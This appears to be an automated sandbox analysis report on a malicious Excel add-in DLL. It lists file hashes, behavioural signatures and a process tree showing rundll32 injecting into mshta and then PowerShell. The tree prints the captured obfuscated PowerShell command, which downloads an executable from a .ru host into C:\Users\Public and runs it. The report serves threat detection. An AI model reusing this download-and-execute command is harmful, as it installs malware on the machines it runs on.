Analysis
- max time kernel: 16s
- max time network: 151s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 08-07-2021 14:29

Static task: static1

Behavioral task: behavioral1
- Sample: 0708_5355150121.xll.dll
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: 0708_5355150121.xll.dll
- Resource: win10v20210408
General
- Target: 0708_5355150121.xll.dll
- Size: 23KB
- MD5: 41e0318dfdb1c180a375a7efc712649e
- SHA1: f0c230010c7b85544c25879d4daf74479360e1bc
- SHA256: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
- SHA512: b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: flow 10, pid 1336, process rundll32.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoC)
  Processes: pid 416 WerFault.exe, target pid 3852 mshta.exe
- Modifies registry class (1 IoC)
  Processes: rundll32.exe; key created: \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: pid 416 WerFault.exe (14 occurrences)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: pid 416 WerFault.exe; tokens: SeRestorePrivilege, SeBackupPrivilege, SeDebugPrivilege
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes: rundll32.exe, rundll32.exe, mshta.exe
  - PID 808 rundll32.exe wrote to memory of 1336 rundll32.exe (3 occurrences)
  - PID 1336 rundll32.exe wrote to memory of 3852 mshta.exe (3 occurrences)
  - PID 3852 mshta.exe wrote to memory of 184 powershell.exe (3 occurrences)
Processes
- Path: C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
  - Suspicious use of WriteProcessMemory
  - Path: C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - Path: C:\Windows\SysWOW64\mshta.exe
      Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\res32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      - Suspicious use of WriteProcessMemory
      - Path: C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1356
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Public\res32.hta
  MD5: 71999a9d2f15e164c9b1fa926aa6444b
  SHA1: c1fbd2b6458b474a208b6cc710951940c9290e5c
  SHA256: da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5
  SHA512: 298eaab6d157e81bb738b1605285a0d14b05ae3656f1bbf72c4921c78b74be7048b6744144469cb4ef48f4d4d233f794c366f192765a4f193c48b2de2eff4c27
- memory/1336-114-0x0000000000000000-mapping.dmp
- memory/3852-115-0x0000000000000000-mapping.dmp